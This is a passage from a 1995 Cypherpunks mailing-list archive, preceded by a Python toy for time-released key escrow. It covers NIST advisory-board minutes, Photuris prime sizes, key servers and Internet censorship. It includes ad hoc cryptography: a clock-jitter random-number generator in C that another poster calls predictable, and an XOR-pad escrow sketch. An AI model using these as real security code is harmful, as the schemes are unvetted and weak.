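        pad = hashlib.sha256(key + off.to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[off:off + 32], pad))
    return bytes(out)


class EscrowAgent:
    """Hypothetical agent: holds one share and refuses it before release_at."""

    def __init__(self, name, share, release_at):
        self.name, self._share, self.release_at = name, share, release_at
        self.online = True  # an agent may also simply disappear

    def request(self, now):
        if not self.online or now < self.release_at:
            return None
        return self._share


def seal(message, release_at, n, m):
    """Encrypt, hand one key share to each of m agents, keep only ciphertext."""
    key = secrets.token_bytes(KEY_LEN)
    agents = [EscrowAgent(f"agent-{x}", (x, y), release_at)
              for x, y in split_key(key, n, m)]
    return xor_stream(key, message), agents


def open_sealed(ciphertext, agents, now, n):
    """Return the plaintext, or None if fewer than n agents release a share."""
    released = [s for s in (a.request(now) for a in agents) if s is not None]
    if len(released) < n:
        return None
    return xor_stream(combine(released[:n]), ciphertext)


if __name__ == "__main__":
    date_x = datetime(1995, 12, 25, tzinfo=timezone.utc)  # constructed date
    ct, agents = seal(b"to be read after Date X", date_x, n=3, m=5)
    print(open_sealed(ct, agents, date_x - timedelta(days=1), 3))  # too early
    agents[0].online = agents[3].online = False                    # two vanish
    print(open_sealed(ct, agents, date_x, 3))                      # 3 remain
```

The sender can publish the ciphertext freely; what the scheme depends on is that fewer than n agents collude or leak before Date X, and that at least n are still reachable afterwards.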
From nobody at REPLAY.COM Wed Nov 8 13:42:30 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 9 Nov 1995 05:42:30 +0800 Subject: CSSPAB June 1995 Message-ID: <199511070540.GAA27604@utopia.hacktic.nl> URL: http://csrc.ncsl.nist.gov/csspab/minutes.695 [Reformatted for easier reading] MINUTES OF THE JUNE 7-8, 1995 MEETING OF THE COMPUTER SYSTEM SECURITY AND PRIVACY ADVISORY BOARD Wednesday, June 7, 1995 Introduction A quorum being present, the Chairman, Dr. Willis Ware, called the meeting to order at 9:00 a.m. at the National Institute of Standards and Technology (NIST), Gaithersburg, Maryland. Besides Dr. Ware, the following Board members were present: Charlie Baggett Jr., Genevieve Burns, Cris Castro, Don Gangemi, Sandra Lambert, Joseph Leo, Henry Philcox, Randy Sanovic, Linda Vetter, Steve Walker, and Bill Whitehurst. Mr. Ed Roback, Board Executive Secretary and newly appointed Designated Federal Official, discussed some of the handouts provided to the Board. Most important, was a copy of a draft House bill referred to as the "Department of Commerce Dismantling Act." If enacted, part of NIST would be transferred to the National Science Foundation. The Commerce Program Resolution Agency (CPRA) would be established and attempt to sell NIST laboratories (and other specified elements of the Department of Commerce) to the private sector. If not sold within 18 months of enactment, CPRA would submit their recommendations to Congress on the appropriate disposition of the property and functions of the laboratories. OMB Circular A-130, Appendix III Update and Review of Comments and "NII Security: The Federal Role" Mr. Ed Springer of the Office of Information and Regulatory Affairs, Office of Management and Budget (OMB), updated the Board on the recently signed Paperwork Reduction Act of 1995. (Copies are available for distribution to the Board.) (ACTION - SECRETARY). Mr. 
Springer said that security remains a concern and is supported by strong language in the law requiring agencies to secure their systems. Mr. Springer updated the Board on Appendix III to OMB Circular A-130. Since his briefing to the Board in March, the comment period for the proposed changes to Appendix III has closed. OMB received twenty-nine written comments to date. He solicited Board members for their reactions to the draft proposal. Mr. Springer was asked how OMB will enforce the requirements of Appendix III. He said enforcement comes through oversight and the budget process. There is a sharper focus on where agencies can go for help. One Board member asked if OMB plans to develop a standard set of behaviors. Mr. Springer replied that OMB will not go that far; however, Appendix III addresses the risks for agencies to use as a guideline for security considerations. Board members noted that agency visits to senior management regarding security plans, as was conducted in the 1989-1990 timeframe, seemed successful. Mr. Springer said that the Federal Managers Financial Integrity Act provides oversight of the requirement for agencies to prepare new plans. Mr. Springer agreed to brief the Board at its September meeting to further discuss the comments received and current status. He mentioned that the final document "NII Security: The Role of Federal Government," would be out soon and Board members would receive copies. (ACTION - SECRETARY). Defensive Information Warfare & Unclassified Government and Private Sector Mr. Martin Hill, Deputy Director for Information Warfare Programs, Office of the Assistant Secretary of Defense, briefed the Board on Information Warfare (IW) from a DoD perspective. He said that commanders should not depend on information and information systems that they cannot rely on. He used the example of Desert Storm, which was won through the use of intelligence; Iraq, in effect, lost the war before it even began. Mr.
Hill said that IW is driven by daily attacks on U.S. computer networks. The national security construct is changing because DoD utilizes commercial sector security and shares their vulnerabilities. The DoD unclassified definition of IW is "Actions taken to achieve information superiority in support of national military strategy by affecting adversary information and information systems while leveraging and protecting our information and information systems." Some of the areas that need defending are: leadership; command facilities; integrated air defense and controls; computers, software, data bases, and displays; power production sources; and links to media. The U.S. IW strategy is to: - Use U.S. technological superiority to provide the right information to the right place at the right time, - Aggressively defend against attacks on our information, and - Use offensive techniques to attain and maintain information superiority. Mr. Hill also emphasized the need for and importance of training. He said they have assembled "Red Teams" made up of DoD personnel that converge on other DoD systems to determine their vulnerabilities. When asked how DoD could best communicate their requirements to the commercial sector, Mr. Hill said that they conduct seminars and "war games" which are both attended by industry. (See Reference #1.) X/Open Security Branding Proposal Mr. Peter Callaway, Senior Security Technologist for IBM, provided the Board with an update on the X/Open security branding proposal. Mr. Callaway was speaking from three perspectives: IBM (a member of X/Open), X/Open, and as a user. He said that X/Open feels they have the appropriate and proven experience by setting industry standards and performing conformance branding. X/Open has the commitment of vendors to build products to their specifications with regard to technical plans established with vendor cooperation and commitment to product follow-through. 
X/Open Branding is a certification scheme for conformance verification, not evaluation. Currently, X/Open branding requires evidence of successful execution of a test suite where appropriate test suites are available. It requires a conformance statement questionnaire and a trademark license agreement to be completed by the applicant. (See Reference # 2.) Security Policy Board (SPB) Update Ms. Vicki LaBarre, Security Policy Board (SPB) Staff, briefed the Board on the progress of the SPB. Ms. LaBarre reminded the Board of the role of the SPB as chartered by Presidential Decision Directive (PDD)-29. The SPB and Security Policy Forum are jointly chaired by DoD and intelligence community members, but their members include non-DoD and non-intelligence community representatives. Ms. LaBarre relayed that the SPB considers itself an "honest broker" to identify issues and positions from all parties on key questions. She said that the fundamental question is whether the executive branch needs a single, consolidated INFOSEC policy making mechanism. If a consolidated INFOSEC policy making mechanism is needed: Can the existing SPB structure created by PDD-29 meet that need? - If yes: how should an information systems security committee be chartered and constituted? - If not: how could/should the SPB/SPF be modified to become an effective INFOSEC policy mechanism? What other existing entity in the executive branch could act, or be modified to act as the executive branch's INFOSEC policy making apparatus? What kind of new entity could be created to meet this policy making need? If a consolidated INFOSEC policy making mechanism is not needed: - How can the existing INFOSEC policy and advisory boards, committees, forums, etc., be made to more effectively identify, prioritize, resource and act on major INFOSEC issues and vulnerabilities affecting the national interest? 
- Are executive branch INFOSEC resources adequate to provide for acceptable security for government information systems? - Are existing INFOSEC resources appropriately located and distributed within the executive branch? Recently the SPB staff convened a special working group to draft a resolution to call for compiling a list of major INFOSEC issues. The matter will be discussed at the Security Policy Board Forum meeting on June 23. In summary, Ms. LaBarre emphasized that we must do a better job of INFOSEC governmentwide which is doable if everyone works together for the common good. Throughout Ms. LaBarre's presentation, some Board members expressed serious concerns about many aspects of the SPB's charter, the first SPB staff report and their present stance on the effort of a single policy making mechanism. Some Board members expressed the view that the initial report was not clear with regard to what kind of information would encompass "national interest." She said that the first report was purely a "think piece" to stimulate discussion, which it has done. (See Reference #3.) Commercial Key Escrow Update Mr. Steve Walker, President, Trusted Information Systems (TIS), presented the Board with an update of TIS' Commercial Key Escrow (CKE) activities. Mr. Walker recently met with senior management of National Semiconductor Corporation. They discussed a proposal to use CKE in an escrowing approach called Commercial Automated Key Escrow (CAKE) in which the CKE system has been modified to work with National's PersonaCard cryptographic hardware tokens. Mr. Walker believes that this approach meets the needs expressed by the Vice President. CAKE does the following: 1. It removes all very strong cryptography from software. 2.
It uses these special CAKE tokens to automatically escrow an encrypted copy of every message key within the message envelope itself, in a special Data Recovery Field (DRF) consisting of the message key and Data Recovery Center (DRC) and token identifiers, encrypted with the public key of a Designated DRC. 3. It provides access to DRFs via the private key of the DRCs, and allows any user to establish their own DRC to safeguard corporate information. 4. It uses well known cryptographic algorithms such as DES, triple DES and RSA, instead of algorithms such as Skipjack. 5. Finally, it gives American computer and communications industries the ability to easily export strong and very strong encryption as part of their information highway products. Mr. Walker briefly discussed the software binding issue which has been put off by implementation into the PCMCIA card but, it still needs to be tried and a software vendor is being sought to do so. The card implementation is aimed at files and e-mail, not telephony. There is initial concern with regard to cost, however, it is tamper proof and cannot be distributed over the Internet. Mr. Walker said they are seeking export approval with DES and CKE and hopes for a position resolution in the near future. (See Reference #4.) The meeting recessed at 5:20 pm. Thursday, June 8, 1995 SI-PMO Action Plan Briefing Mr. Al Williams, Acting Director of the Security Infrastructure Program Management Office (SI-PMO) at GSA, updated the Board on the activities and progress of the SI-PMO. He discussed some of the near term goals: identifying and resolving critical policy issues related to support multiple technologies, developing a security architecture, defining user-to-user and user-to SI specifications, and establishing a formal liaison between the SI-PMO and the Canadian Government. Board members asked about milestones. Mr. Williams directed members to the summary of the near-term actions and milestones in the Action Plan appendix.
When asked who has received the Action Plan, Mr. Williams replied that it was distributed to the Government Information Technology Services Group, the National Information Infrastructure Security Issues Forum, the Electronic Commerce Acquisition Program Management Office, the E-Mail Program Management Office, NSA, NIST, and the PKI Steering Committee. The Board commended Mr. Williams for working an issue with a real time frame. Mr. Williams was invited to come back and update the Board as he feels appropriate. (See Reference #5.) Common Criteria Update Dr. Stu Katzke, Chief, NIST Computer Security Division, updated the Board on the Common Criteria (CC) effort. He discussed the Common Criteria for Information Technology Security Evaluation workshop on May 11-12 in Ottawa, Canada. Approximately 40 people from Europe, Canada, the U.S., and Japan participated in the workshop. The workshop served to allow the CC Editorial Board to: - provide general information on the comments received and the planned changes to the document based on these comments; and - receive added clarifications on the reviewers' comments on the document so they can update the document to reflect the expert opinions. The number of assurance levels and where they are were discussed; however, that issue is not as high on the list as the six key global issues below: 1. Document Organization - understandability and usefulness; 2. Extensibility of Requirements - support of ITSEC is unclear; 3. Extensibility of CC - how to maintain the CC; 4. Protection Profile - relationship unclear; 5. Protection Profile - selection of requirements; and 6. Dependencies and Binding - completeness/correctness. Dr. Katzke said that the NCSC plans to perform evaluation trials by January of 1996. (See Reference #6.) Mr. Charlie Baggett volunteered to brief the Board in September on trial evaluations. (ACTION - SECRETARY AND MR. BAGGETT.) 
The discussion then turned to the Board's March resolution (95-2) which recommended to NIST and NSA that a statement be made regarding the equivalence of C2-level evaluated products. Mr. Lou Giles of NSA briefed the Board on NIST and NSA's response to that recommendation. In July, NIST and NSA will publicly clarify the relationship between TCSEC C2, ITS EC E2, and CTCPEC T1 levels to encourage federal programs with requirements for evaluated low assurance level products to use trusted products evaluated at these levels. NIST and NSA will publish a Bulletin in July 1995, which will describe a structure for the selection and acceptability of these products. The Bulletin will include an appendix listing the products evaluated and in evaluation under each criteria. (See Reference #7.) Mr. Giles used the phrase "selection preferences for C2 requirements." Some Board members said that the word preference takes away from equivalency and they are concerned that the list of requirements is a preference list rather than a menu. Selection preferences for C2 requirement are as follows: - C2 products on U.S. EPL; - Products under U.S. TCSEC Evaluation (C2); - FPC2/T1 products on Canadian EPL or FC2/E2 products on European EPL; and - Products under CTCPEC (FPC2/T1) or ITSEC (FC2/E2) Evaluation. Some Board members are concerned that the list suggests that U.S. products be used first, thereby implying that they are better than other products. In discussion, most Board members recommended they order the products in rank of completed vs non-completed. Mr. Giles updated TTAP accomplishments. To date the work group has performed the following: - Drafted an SOW for TTAP Developmental Commercial Evaluation (Feb. 95); - Annotated outline for document on what it takes to be accredited under NVLAP (Mar. 95); - Drafted first suggested evaluator actions for TCSEC Class C2 provided to NVLAP for review (Apr. 
95); - Drafted second suggested evaluator actions for TCSEC Class C2 (May 95); and - Drafted first Technical Review Board expectations of a team (May 95). Future activities for TTAP include: - Contract for TTAP Developmental Commercial Evaluation (Jun/Jul 95); - Start TTAP Developmental Commercial Evaluation (Aug. 95); - Conduct lessons learned from contracted effort (May 96); and - Expect NVLAP to accredit several Labs (NLT Aug. 96). (See Reference #8.) Privacy Update [Statement by Mr. Robert Gellman omitted] Discussion During discussion time, Board members voted on and unanimously approved the minutes of the March, 1995 meeting. The Board engaged in a lengthy discussion concerning PDD-29 and the intent of the charter of the SPB. Board members debated the idea of a single policy focal point. They also debated the phrase in PDD-29 "National Security." One Board member reminded the Board of a Government Computer News article that PDD-29 appears to be clouded as to whether the PDD intended to include sensitive unclassified information in addition to national security (i.e., classified/Warner Amendment) information. A motion was moved and seconded directing the chairman to draft a letter to the Co-Chairs of the SPB and the SPF, articulating the need for clarification of PDD-29 and the SPB charter. (ACTION-CHAIRMAN AND SECRETARY.) PKI Steering Committee Activities Mr. Robert Rosenthal, Manager, NIST Protocol Security Group, briefed the Board on the activities of the Public Key Infrastructure (PKI) Steering Committee. Three working groups reside under the Committee: technical (chaired by IRS), business and legal (chaired by Treasury), and users (chaired by the SI-PMO). The Steering Committee continues to liaise with the Canadian and Swedish governments, the Internet community, the American Bankers and American Bar Associations and the U. S. Council for International Business. 
The Steering Committee is exploring the establishment of a Cooperative Research and Development Agreement (CRDA) with industry organizations to: - Research and Develop a PKI Interoperability Test Plan and a NIST PKI Test Facility; - Publish test procedures and lessons learned; and - Develop and Demonstrate Interoperable Certificate Services on a wide variety of Internetworked Communications Facilities. Mr. Rosenthal said there are workshops and special projects slated for the future to include a tri-sponsored PKI Invitational Workshop Series by NIST, the Security Infrastructure Program Management Office and MITRE. Also planned, are some interdivision projects such as: PKI, time and attendance, travel, procurement, and others that will be available on the "NISTNET." NISTNET is a campus-wide local area network for NIST. (See Reference #9.) DISA/ARPA/NSA Memorandum Of Understanding Briefing Mr. John Davis, Director, NSA's National Computer Security Center, briefed the Board on the Memorandum Of Understanding (MOU) between the Defense Information Systems Agency (DISA), the Advanced Research Projects Agency (ARPA), and the National Security Agency (NSA). He said that ARPA and NSA are the major INFOSEC research programs in government and the major user of INFOSEC is DISA. The Information Systems Security Research Joint Technology Office was established by a Memorandum Of Agreement (MOA) in March of 1995 and signed by the Directors of ARPA/DISA/NSA to coordinate security research efforts with a heavy reliance upon commercial technology. The following nine items were called out in the agreement: 1) Strategic Planning, 2) Review and Coordinate, 3) Evaluate Proposals, 4) Metrics, 5) Prototypes, 6) COTS, 7) Standards, 8) Crypto and 9) Public. Mr. Davis said this is work in progress and they are looking for useful results. Vendors will show their products at the NIST/NCSC National Information Systems Security Conference (NISSC) in Baltimore in October. Mr. 
Davis stated that the intent is not to focus only on DoD. A Defense solution would be costly, therefore, commercial products with built in security are needed. (See Reference #10.) Public Comment [Omitted] From iagoldbe at calum.csclub.uwaterloo.ca Wed Nov 8 15:47:54 1995 From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) Date: Thu, 9 Nov 1995 07:47:54 +0800 Subject: November Bay Area meeting? was: Decemeber SF Bay Area Cyperpunks In-Reply-To: <199511080549.VAA04978@anemone.corp.sgi.com> Message-ID: <47qmok$nnk@calum.csclub.uwaterloo.ca> In article <199511080549.VAA04978 at anemone.corp.sgi.com>, Katy Kislitzin wrote: >Hi-- > >Eric Messick and I will be holding the Decemeber C'punks meeting at >our geodesic dome in the Santa Cruz Mountains. It will be a >combination meeting and holiday get-together. It will be happening on >the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead >of the usual noon. A more spirited announcement will follow closer to >the date. Speaking of which, did I miss an announcement of the November meeting? My mail server was down for a few days, so it's entirely possible. If that's the case, can someone repost it or send it to me? Thanks, - Ian From bal at martigny.ai.mit.edu Wed Nov 8 16:09:16 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Thu, 9 Nov 1995 08:09:16 +0800 Subject: Photuris Primality verification needed In-Reply-To: <199511080143.RAA22564@servo.qualcomm.com> Message-ID: <9511081704.AA24263@toad.com> Date: Tue, 7 Nov 1995 17:43:49 -0800 (PST) From: Phil Karn Cc: cypherpunks at toad.com, ipsec-dev at eit.COM > Our practical experiences with discrete logs suggests that the effort > required to perform the discrete log precomputations in (a) is slightly > more difficult than factoring a composite of the same size in bits. In > 1990-91 we estimated that performing (a) for a k-bit prime modulus was > about as hard as factoring a k+32-bit composite. 
[Recent factoring work > has probably changed this a bit, but it's still a good estimate.] This is also my understanding, which I got from you in the first place. I take it there have been no dramatic breakthroughs in the last few years in the discrete log problem? How heavily has it been studied in comparison with factoring? Factoring has received more attention than discrete log; certainly when it comes to net-wide computations it's all factoring. But that's partly due, I think, to a lack of targets to attack. Still, requiring support of a fixed modulus for shared public use is important to promote a basic level of interoperability. This has its risks, but it should be okay *provided* it's a strong prime of sufficient strength to preclude the precomputation of the discrete log tables by even a highly motivated and resourceful attacker. And as a backup the protocol should provide for the optional use of private moduli between consenting parties. Sound reasonable? You definitely should allow any modulus between consenting parties. As for what moduli the standard says "must be" (vs. "should be") supported, I don't know. Maybe the right thing to do is require conforming implementations to support a large modulus but include recommended smaller moduli. Then Alice can always force Bob to use the large modulus but, if both agree, they can use something smaller from the standard or even their own home-grown modulus. --bal From dreschs at mpd.tandem.com Wed Nov 8 16:09:21 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Thu, 9 Nov 1995 08:09:21 +0800 Subject: Exporting software doesn't mean exporting In-Reply-To: <199511080054.QAA29419@email.pdcorp.com> Message-ID: <199511081517.JAA00972@galil.austnsc.tandem.com.> Adam Shostack said: AS> Thus, if the user in Italy has no reason to expect that their AS> mail to Germany will traverse the US, then I suspect that the US AS> would have a hard time proving any criminal act. 
Doesn't a criminal AS> act require intent of some type? If IP routing, in conjunction with AS> SMTP, beyond the control of the users, ships packets through the US, AS> I have a hard time believing that that makes those users criminals. IANAL, but if they have the intent to transfer cryptographic software, and can 'reasonably' (wonderful precision there) be expected to know that there is the potential for portions of the transfer to be routed through US systems, then I'm guessing that it could be construed that they had the intent to commit a crime. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From perry at piermont.com Wed Nov 8 16:10:01 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 9 Nov 1995 08:10:01 +0800 Subject: True Random (short c-source) In-Reply-To: Message-ID: <199511081613.LAA00447@jekyll.piermont.com> What you are doing, basically, is using the processor execution time loops to measure jitter in the return of the value of clock(). I don't know how clock() works but I would venture to guess that the jitter in more predictable than you think. .pm Frank Andrew Stevenson writes: > I have written a short random number generator which appears to produce > reasonable random numbers even in DOS, at the heart of the code is the > short function fGetRand, the amount of entropy derived from this > function varies from >1 to >>6 depending on system load, I haven't > made any effort to whiten it at all. I am not making any claims about > its usefulness. I am only trying to demonstrate the ease at which > good random number may be obtained. Any comments and analysis will be > mostly welcome, the source is hereby placed in the public domain: > > I have used WATCOM10 to compile and test under DOS/WIN95, where > clock is running at 18hz. I have also tested on IRIX with impressive > results. 
>
> --- START ----
> #include <stdio.h>
> #include <stdlib.h>
> #include <time.h>
>
> int fGetRand (void);
>
> int main (void) {
>     long vCount;
>     FILE *out;
>     int byte = 0;   /* accumulates the sampled bits */
>     int tick;
>
>     out=fopen("random.bin","wb");
>     if(out==NULL) {
>         printf("cant write to file random.bin\n");
>         exit(1);
>     }
>
>     for(vCount=1;vCount<=512;vCount++) {
>         tick=fGetRand()&0x01;   /* keep the low bit of each sample */
>         byte=byte+byte+tick;    /* shift the new bit in */
>         if((vCount & 0x7)==0) fputc((char)byte,out);   /* packed byte every 8 samples */
>         fputc((char)tick,out);  /* the raw bit is written as well */
>     }
>
>     fclose(out);
>     return 0;
> }
>
>
> /* Count loop iterations until clock() moves to its next value. */
> int fGetRand (void) {
>     int count = 0;
>     clock_t tick;
>
>     tick=clock();
>     while(tick==clock()) count++;
>
>     return (count);
> }
> ----- END -----
>
> PGP encrypted mail preferred, finger for key.
> The above views are ONLY endorsed by BoggleMind Inc. (not to be confused
> with MindBoggle Ltd.)
>
>
>

From droelke at spirit.aud.alcatel.com Wed Nov 8 16:10:33 1995
From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 9 Nov 1995 08:10:33 +0800
Subject: toolkits?
Message-ID: <9511081640.AA27938@spirit.aud.alcatel.com>

> >
> >Third - provide services to the citizenry. For example - provide
> >a public key server. Or how about a digital time-stamping service.
> >If the crap was kept out of these services, and they were free for
> >anyone to use, then it would advance the idea of encouraging people to
> >use crypto in their daily lives.
> >
>
> Now we're getting specific. These are things that us ordinary folk can do
> which show the 'leaders' how to follow. What software, hardware,
> applications, support and sysadmin experience is required and where is it
> available on what terms. What are the cash flow opportunities to support
> such services?

PGP Public key servers - see MIT's key server as a good example.
Digital time-stamping service - see Betsie (sp?) from Bellcore as a basis.

These are things that are already out there, BUT I think that we can use more services like this. Commercially there probably isn't the demand to support these yet, but I think we have a chicken and the egg problem here.
People can't use encryption easily if they don't have good access to the tools, but people won't demand services like key-servers until they start using the tools.

A good service would be to provide and support distribution of privacy enhancing tools to universities and companies that want them. i.e. have people who will help set up firewalls, PGP, encrypted telnet (pick your flavor), etc. A state wide group that has grants to provide internet connectivity for universities and companies could have a person that does nothing but work with these companies to help incorporate encryption into their networks.

For instance, my employer has hardware engineers putting VLSI designs on tape, and then fed-ex'ing them to the chip manufacturer, because they can't get good encryption set up that allows secured ftp transfers. (and get the manufacturer to agree to the same encryption technology, etc. etc. etc.)

Yes - I know that most of this stuff is out there already, but having people *willing* to integrate it for you without charging an arm and a leg would go a long way towards convincing the suits that this is a *good* thing.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke at aud.alcatel.com                             Richardson, TX

From perry at piermont.com Wed Nov 8 16:11:49 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 08:11:49 +0800
Subject: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed)
In-Reply-To:
Message-ID: <199511082020.PAA09434@jekyll.piermont.com>

Richard Johnson writes:
> Hilarie Orman wrote:
> >If you are willing to accept that in all likelihood, one year from
> >now, some group will announce that can "crack" all key exchanges that
> >using the published modulus, then sure, call it sufficient.
>
> Sounds like someone just threw down a gauntlet.
>
> Is it even possible to do the precomputations in a distributed manner in
> less than a year or two?
I would guess that it probably is. However, there is no point in trying to do this yet since I suspect that Phil and Bill can be convinced that its a bad idea to specify a 512 bit modulus. Perry From Richard.Johnson at Colorado.EDU Wed Nov 8 16:15:34 1995 From: Richard.Johnson at Colorado.EDU (Richard Johnson) Date: Thu, 9 Nov 1995 08:15:34 +0800 Subject: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hilarie Orman wrote: >> Well, since we already require 56-bit DES in ESP in the interests of >> promoting basic interoperability, wouldn't a 512-bit prime be >> similarly sufficient? > >If you are willing to accept that in all likelihood, one year from >now, some group will announce that can "crack" all key exchanges that >using the published modulus, then sure, call it sufficient. Sounds like someone just threw down a gauntlet. Is it even possible to do the precomputations in a distributed manner in less than a year or two? Or maybe starting a few years down the road? It would be nice to give Photuris a chance to get established before the least common denoninator shared modulus gets taken out, if we even can take it out. Richard -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMKDVvfobez3wRbTBAQHpkgP9Fg+MGMz8U6Bisv45PZohoZxWbiEYuxJK tg8oHD8TZRQsuqCwveWFRTnmPGiGKs2cBs5ZKXkFNU6ot7lZLO8d/1BSSjo0yX2Q 0FSXDSaBjUKIFcjHHGYBWrZZ+gjc/bdab94EqQvmFSUmAp73/mnKZgcyUPGL3Cmt MW3jZhlVMdw= =bfsQ -----END PGP SIGNATURE----- From dsmith at midwest.net Wed Nov 8 16:19:58 1995 From: dsmith at midwest.net (David E. Smith) Date: Thu, 9 Nov 1995 08:19:58 +0800 Subject: expiration dates on cryptography Message-ID: <199511081549.JAA28561@cdale1.midwest.net> At 07:21 AM 11/8/95 -0500, John Curtis wrote: >Given that trust is often of an ephemeral nature, it would be >quite useful to set time limits on secrets. 
Would it be possible >to cryptographically protect a secret such that it could not be >decrypted after a certain time? It's a nice idea, really. The problem is - how do you verify the absolute time? For instance, by resetting a PC's internal clock you can instantly circumvent that measure. Possibly by forcing the application to consult a "reliable" clock like one of the cesium clocks, but that could be hacked. Unless you can absolutely, reliably, and without fear/danger of being hacked around, verify the correct time, self-destruct crypto probably won't happen. ----- David E. Smith, dsmith at midwest.net, PGP ID 0x92732139 http://www.midwest.net/scribers/dsmith From vanhorn at hks.net Wed Nov 8 16:23:00 1995 From: vanhorn at hks.net (Kevin S. Van Horn) Date: Thu, 9 Nov 1995 08:23:00 +0800 Subject: DejaNews all over again--a URL for Usenet Searching Message-ID: <199511082054.PAA07132@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- tcmay at got.net (Timothy C. May) wrote: > >Paul Robichaux pointed me to another searcher, http://www.excite.com/, >which _does_ index the alt groups. I'm sure more are coming, reaching >further and further back in time. A small point of information. I work for Architext, the company that provides the excite service. We only keep the last two weeks of USENET news around, and don't keep any archives going further back than that. USENET is just too damn huge for us to go to the trouble of keeping comprehensive archives around without good evidence of demand for it among our target audience. - ------------------------------------------------------------------------------ Kevin S. Van Horn | Uncle Sam needs YOU! vanhorn at atext.com | But not vice versa. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMKEY8ioZzwIn1bdtAQFFEgGA1e12AazfexoLEvlrQDWFGPqFOXafAgBZ NxKKd+nWATgsUQhwI7jQ0P8pTQ9XvI1k =7sgB -----END PGP SIGNATURE----- From jya at pipeline.com Wed Nov 8 16:23:57 1995 From: jya at pipeline.com (John Young) Date: Thu, 9 Nov 1995 08:23:57 +0800 Subject: Return of the Cyber-Censors Message-ID: <199511082002.PAA13786@pipe9.nyc.pipeline.com> The Washington Post, November 8, 1995. Return of the Cyber-Censors [Editorial] When the Senate passed its ill-advised "Exon amendment" to the telecommunications bill last spring, which would criminalize the transmission of obscene, pornographic or "indecent" material on the Internet, the measure got an overwhelming 84 votes, many of them from senators who didn't understand the implications of the move. Only a few weeks later, the House went even more overwhelmingly the other way, voting 420 to 4 for an amendment (co-sponsored by Reps. Ron Wyden and Christopher Cox) that would bar the Federal Communications Commission from regulating cyberspace and would instead make it legally easier for commercial Internet providers to use their own technical tools to regulate questionable material. The contrast was the result of a burst of public discussion in which more technologically astute members, including House Speaker Newt Gingrich, caught on to the disturbing fact that the kinds of far-reaching liability imposed by Sen. James Exon's formulation -- hastily adapted from an existing measure on telephone transmission -- would cripple practically any commercial Internet provider and effectively lame the new medium as a venue for moneymaking activity. Now these vastly different measures are in conference committee along with the rest of the telecommunications bill (in other areas of which, we remind readers once again, The Washington Post Co. has some interests). But the seeming clarity afforded by the House response to the Exon amendment and by Mr. 
Gingrich's appreciation of the need for untrammeled development of the new medium is nowhere to be seen. A letter from Christian Coalition head Ralph Reed, Phyllis Schlafly and other prominent spokesmen for the religious right is urging the conferees toward an Exon-style approach that's as destructive now as it ever was. The House bill also could end up including an amendment sponsored by Rep. Henry Hyde that adds some criminal liability to the transmission of obscene (but not "indecent") images via the new technologies. The argument against "criminalizing" the transmission of "indecent" images via the Internet remains stark and simple, and it goes not to the awfulness of child pornography or even to the ability of parents to control what their children do on the computer (a wide variety of off-the-shelf technological filters now exist that let parents do this themselves) but to the impossibility of regulation by the electronic middleman industries that are developing. Commercial providers such as America Online continue to pass along millions of messages a day, the interactive "newsgroups" unfold quickly and internationally, and the kind of central filtering envisioned by would-be regulators erases the very quality that makes the Internet a live and promising medium -- its inexpensive accessibility. If the Internet were like a telephone system, there would at least be the possibility of identifying a specific "sender" and "recipient." On the Internet it's "receivers" who do the selecting of what to look at and where. Giving those recipients the tools they need remains the way to go. The conferees should resist the urge to censor cyberspace. From sunder at amanda.dorsai.org Wed Nov 8 16:28:22 1995 From: sunder at amanda.dorsai.org (Ray Arachelian) Date: Thu, 9 Nov 1995 08:28:22 +0800 Subject: Bruce Schneier's Applied Cryptography, 2nd Edition In-Reply-To: Message-ID: On Fri, 3 Nov 1995, Timothy C. 
May wrote: > At 2:48 PM 11/3/95, Ray Arachelian wrote > >Now does anyone want my old 1st edition? :-) > > I am interested. I will trade five (5) slightly used prime numbers for it. > > (Has anybody ever thought about using prime numbers as a medium of barter > in a digital economy? Think of the labor that would be saved if we all > didn't have to compute our own!! :-}) Sure, why not. As soon as someone offers something I'd like to get, for which they would like the five even more slightly used primes. :-) But seriously, it'll be cool to trade for the book and get something useful I'd want anyway... If not I'll probably chuck it to the public library with a post it note that says Anonymous Donation. :-) ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ===================http://www.dorsai.org/~sunder/========================= From ylo at cs.hut.fi Wed Nov 8 16:33:11 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Thu, 9 Nov 1995 08:33:11 +0800 Subject: Photuris Primality verification needed In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com> Message-ID: <199511081833.TAA10801@soikko.cs.hut.fi> > Well, since we already require 56-bit DES in ESP in the interests of > promoting basic interoperability, wouldn't a 512-bit prime be > similarly sufficient? *NO*, because you have to break the 56-bit DES separately every time, whereas doing the precomputation for the 512 bit prime is a one-time job. Once anyone has done the precomputation, *all* communications will be open to whoever is in possession of the database. 
I think there is good reason to believe that if the 512 bit prime is allowed, it will be widely used, and even if it is found breakable, it will not be easily changed (just think about the experience with Sun's "secure" rpc, and how quickly their primes have been changed - and it still has much narrower deployment than what is hoped for ipsec).

Let me include below a message I sent to Bill Simpson.

> If it is kept, the commercial vendors will probably start using it
